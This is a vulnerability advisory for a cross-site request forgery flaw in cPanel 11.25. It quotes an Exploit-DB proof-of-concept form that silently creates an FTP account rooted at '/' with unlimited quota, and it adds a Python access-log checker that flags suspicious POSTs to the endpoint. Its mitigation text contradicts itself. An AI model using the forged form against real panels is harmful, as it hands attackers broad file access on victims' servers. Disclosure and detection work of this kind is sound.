Vendor: cPanel
CVSS: 5.5 (MEDIUM)
CWE: 352 (Cross-Site Request Forgery)
Product Name: cPanel
Affected Version From: cPanel 11.25
Affected Version To: Other versions may also be affected.
Patch Exists: NO
CPE: a:cpanel:cpanel:11.25

cPanel Cross-Site Request Forgery Vulnerability

cPanel is affected by a cross-site request forgery (CSRF) vulnerability. By exploiting it, an attacker can perform certain administrative actions on behalf of the victim, which may lead to further attacks.

Mitigation:

There is no known mitigation or remediation for this vulnerability. It is recommended to update to the latest version of cPanel to prevent exploitation.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41391/info

cPanel is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions. This may lead to further attacks.

cPanel 11.25 is vulnerable; other versions may also be affected.

<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="http://www.example.com/frontend/x3/ftp/doaddftp.html">
<input type="hidden" name="login" value="name"/>
<input type="hidden" name="password" value="pass"/>
<input type="hidden" name="password2" value="pass"/>
<input type="hidden" name="homedir" value="/"/>
<input type="hidden" name="quota" value="unlimited"/>
</form>
</body>
</html>
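
Added example, not part of the original advisory or of cPanel's code: a log check for the request the form above produces, a POST to doaddftp.html whose Referer is missing or points away from the panel host. It assumes Apache combined-format access logs and a caller-supplied set of panel hostnames; the function name and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Endpoint taken from the proof-of-concept form on this page.
WATCHED_PATH = "/frontend/x3/ftp/doaddftp.html"

# Assumption: Apache/NCSA "combined" access-log format.
LINE_RE = re.compile(
    r'^\S+ \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)


def find_suspect_posts(lines, panel_hosts):
    """Return (timestamp, user, reason) for each POST to WATCHED_PATH whose
    Referer is absent or names a host outside panel_hosts."""
    trusted = {h.lower() for h in panel_hosts}
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        if urlsplit(m["target"]).path != WATCHED_PATH:
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            reason = "missing-referer"
        else:
            try:
                host = (urlsplit(referer).hostname or "").lower()
            except ValueError:  # malformed Referer value
                host = ""
            if host in trusted:
                continue  # submitted from a page on the panel itself
            reason = "cross-site-referer:" + (host or "unparseable")
        findings.append((m["ts"], m["user"], reason))
    return findings


# Constructed sample log lines (not real traffic); hosts and users are made up.
_POST = '"POST /frontend/x3/ftp/doaddftp.html HTTP/1.1" 200 512'
SAMPLE_LOG = [
    f'203.0.113.7 - alice [05/Jul/2010:10:01:12 +0000] {_POST} "http://www.example.com/frontend/x3/index.html" "Mozilla/5.0"',
    f'203.0.113.7 - alice [05/Jul/2010:10:03:40 +0000] {_POST} "http://blog.example.net/post.html" "Mozilla/5.0"',
    f'198.51.100.9 - bob [05/Jul/2010:11:15:02 +0000] {_POST} "-" "Mozilla/5.0"',
    '198.51.100.9 - bob [05/Jul/2010:11:16:30 +0000] "GET /frontend/x3/ftp/doaddftp.html HTTP/1.1" 200 512 "http://blog.example.net/post.html" "Mozilla/5.0"',
]
```

Calling find_suspect_posts(SAMPLE_LOG, {"www.example.com"}) returns the second and third entries. A missing Referer can also come from browser privacy settings, so those hits are leads for triage rather than confirmed forgeries.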